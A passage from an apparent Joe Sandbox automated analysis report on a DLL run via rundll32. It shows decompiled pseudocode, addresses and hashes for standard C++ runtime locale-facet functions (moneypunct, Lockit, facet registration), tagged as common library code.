									__eflags = E6E21C229(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t154 - 0x20);
										E6E223D74(_t154 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t110, _t144, _t148, 0x14);
										E6E206653(_t154 - 0x14, 0);
										_t149 =  *0x6e2c6e44; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6E1E161C(0x6e2c6e24);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6E2066BA(_t154 - 0x14);
											return E6E220075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6E21C295(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6E1E1438(_t131);
													E6E223D74(_t154 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e26851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6e26c414;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6E21D028(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6E220075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6E206FD3(__eflags, _t145);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6e2c6e44 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6E206FD3(__eflags, _t144);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6e2c6e40 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6E206FD3(__eflags, _t143);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6e2c6e38 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}















                          0x6e21ba8a
                          0x6e21ba8a
                          0x6e21ba91
                          0x6e21ba9b
                          0x6e21baa0
                          0x6e21baab
                          0x6e21baaf
                          0x6e21bab2
                          0x6e21bab7
                          0x6e21babb
                          0x6e21bac0
                          0x6e21bac4
                          0x6e21bb09
                          0x6e21bb0c
                          0x6e21bb18
                          0x6e21bac6
                          0x6e21bac8
                          0x6e21bace
                          0x6e21bad4
                          0x6e21badc
                          0x6e21badf
                          0x6e21bb1c
                          0x6e21bb2a
                          0x6e21bb2f
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb66
                          0x6e21bb68
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e
                          0x6e21bae1
                          0x6e21bae1
                          0x6e21bae4
                          0x6e21bae8
                          0x6e21baec
                          0x6e21baf9
                          0x6e21bb01
                          0x6e21bb03
                          0x00000000
                          0x6e21bb03
                          0x6e21baca
                          0x6e21baca
                          0x00000000
                          0x6e21baca
                          0x6e21bac8

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21BA91
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21BA9B
                          • int.LIBCPMT ref: 6E21BAB2
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E21BAD5
                          • std::_Facet_Register.LIBCPMT ref: 6E21BAEC
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BB0C
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21BB2A
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID:
                          • API String ID: 113178234-0
                          • Opcode ID: bce9ecf732a7b4b5fc076547dad1aecc5c1a3bf6f81be0d14a4e478a59f42148
                          • Instruction ID: 734de158d0fa54177c58d4227b11f51af845ccd0e6bbc089bfe5059c94ce5df3
                          • Opcode Fuzzy Hash: bce9ecf732a7b4b5fc076547dad1aecc5c1a3bf6f81be0d14a4e478a59f42148
                          • Instruction Fuzzy Hash: 1911E37A90451ECBCF04DBE4C894AFDB7BBAF45B14F180919E5116B390DBB49A40C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21B9E4, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E21B9E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t198 - 0x14, 0);
				_t189 =  *0x6e2c6e3c; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6E1E161C(0x6e2c6e1c);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6E2066BA(_t198 - 0x14);
					return E6E220075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6E21C120(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t198 - 0x20);
							E6E223D74(_t198 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t184, _t189, 0x14);
							E6E206653(_t198 - 0x14, 0);
							_t190 =  *0x6e2c6e38; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6E1E161C(0x6e2c6e18);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6E2066BA(_t198 - 0x14);
								return E6E220075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6E21C1A4(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t198 - 0x20);
										E6E223D74(_t198 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t141, _t185, _t190, 0x14);
										E6E206653(_t198 - 0x14, 0);
										_t191 =  *0x6e2c6e40; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6E1E161C(0x6e2c6e20);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6E2066BA(_t198 - 0x14);
											return E6E220075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6E21C229(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t198 - 0x20);
													E6E223D74(_t198 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t141, _t186, _t191, 0x14);
													E6E206653(_t198 - 0x14, 0);
													_t192 =  *0x6e2c6e44; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6E1E161C(0x6e2c6e24);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6E2066BA(_t198 - 0x14);
														return E6E220075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6E21C295(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6E1E1438(_t169);
																E6E223D74(_t198 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e26851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6e26c414;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6E21D028(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6E220075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6E206FD3(__eflags, _t187);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6e2c6e44 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6E206FD3(__eflags, _t186);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6e2c6e40 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6E206FD3(__eflags, _t185);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6e2c6e38 = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6E206FD3(__eflags, _t184);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6e2c6e3c = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}


















                          0x6e21b9e4
                          0x6e21b9e4
                          0x6e21b9eb
                          0x6e21b9f5
                          0x6e21b9fa
                          0x6e21ba05
                          0x6e21ba09
                          0x6e21ba0c
                          0x6e21ba11
                          0x6e21ba15
                          0x6e21ba1a
                          0x6e21ba1e
                          0x6e21ba63
                          0x6e21ba66
                          0x6e21ba72
                          0x6e21ba20
                          0x6e21ba22
                          0x6e21ba28
                          0x6e21ba2e
                          0x6e21ba36
                          0x6e21ba39
                          0x6e21ba76
                          0x6e21ba84
                          0x6e21ba89
                          0x6e21ba91
                          0x6e21ba9b
                          0x6e21baa0
                          0x6e21baab
                          0x6e21baaf
                          0x6e21bab2
                          0x6e21bab7
                          0x6e21bac0
                          0x6e21bac2
                          0x6e21bac4
                          0x6e21bb09
                          0x6e21bb0c
                          0x6e21bb18
                          0x6e21bac6
                          0x6e21bac6
                          0x6e21bac8
                          0x6e21bace
                          0x6e21bad4
                          0x6e21badc
                          0x6e21badf
                          0x6e21bb1c
                          0x6e21bb2a
                          0x6e21bb2f
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb66
                          0x6e21bb68
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e
                          0x6e21bae1
                          0x6e21bae1
                          0x6e21bae4
                          0x6e21bae8
                          0x6e21baec
                          0x6e21baf9
                          0x6e21bb01
                          0x6e21bb03
                          0x00000000
                          0x6e21bb03
                          0x6e21baca
                          0x6e21baca
                          0x00000000
                          0x6e21baca
                          0x6e21bac8
                          0x6e21ba3b
                          0x6e21ba3b
                          0x6e21ba3e
                          0x6e21ba42
                          0x6e21ba46
                          0x6e21ba53
                          0x6e21ba5b
                          0x6e21ba5d
                          0x00000000
                          0x6e21ba5d
                          0x6e21ba24
                          0x6e21ba24
                          0x00000000
                          0x6e21ba24
                          0x6e21ba22

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21B9EB
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21B9F5
                          • int.LIBCPMT ref: 6E21BA0C
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E21BA2F
                          • std::_Facet_Register.LIBCPMT ref: 6E21BA46
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BA66
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21BA84
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID:
                          • API String ID: 113178234-0
                          • Opcode ID: 384db94be18ed0e5724856dfb2a9809d3d77c266152c34c1e825148bb8edba5b
                          • Instruction ID: c1249fca7f6cc80b9db5a7902068ea75e5d80f79faff2a3094615eaa3eb0b955
                          • Opcode Fuzzy Hash: 384db94be18ed0e5724856dfb2a9809d3d77c266152c34c1e825148bb8edba5b
                          • Instruction Fuzzy Hash: 33113279D0451ECBCF00DBE4C898AEDB7BBAF44B04F140919E510AB390CBB49B41CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F9F1, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F9F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t242 - 0x14, 0);
				_t231 =  *0x6e2c6de0; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6E1E161C(0x6e2c6d8c);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6E2066BA(_t242 - 0x14);
					return E6E220075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6E211471(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t242 - 0x20);
							E6E223D74(_t242 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t225, _t231, 0x14);
							E6E206653(_t242 - 0x14, 0);
							_t232 =  *0x6e2c6dfc; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6E1E161C(0x6e2c6da8);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6E2066BA(_t242 - 0x14);
								return E6E220075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6E2114EC(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t242 - 0x20);
										E6E223D74(_t242 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t172, _t226, _t232, 0x14);
										E6E206653(_t242 - 0x14, 0);
										_t233 =  *0x6e2c6dcc; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6E1E161C(0x6e2c6d80);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6E2066BA(_t242 - 0x14);
											return E6E220075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6E211558(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t242 - 0x20);
													E6E223D74(_t242 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t172, _t227, _t233, 0x14);
													E6E206653(_t242 - 0x14, 0);
													_t234 =  *0x6e2c6e00; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6E1E161C(0x6e2c6dac);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6E2066BA(_t242 - 0x14);
														return E6E220075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6E2115C4(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t242 - 0x20);
																E6E223D74(_t242 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t172, _t228, _t234, 0x14);
																E6E206653(_t242 - 0x14, 0);
																_t235 =  *0x6e2c6dd0; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6E1E161C(0x6e2c6d60);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6E2066BA(_t242 - 0x14);
																	return E6E220075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6E21162A(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6E1E1438(_t207);
																			E6E223D74(_t242 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e26851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6e26c0c4;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6E21542F(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6E220075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6E206FD3(__eflags, _t229);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6e2c6dd0 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6E206FD3(__eflags, _t228);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6e2c6e00 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6E206FD3(__eflags, _t227);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6e2c6dcc = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6E206FD3(__eflags, _t226);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6e2c6dfc = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6E206FD3(__eflags, _t225);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6e2c6de0 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}





















                          0x6e20f9f1
                          0x6e20f9f1
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa22
                          0x6e20fa27
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
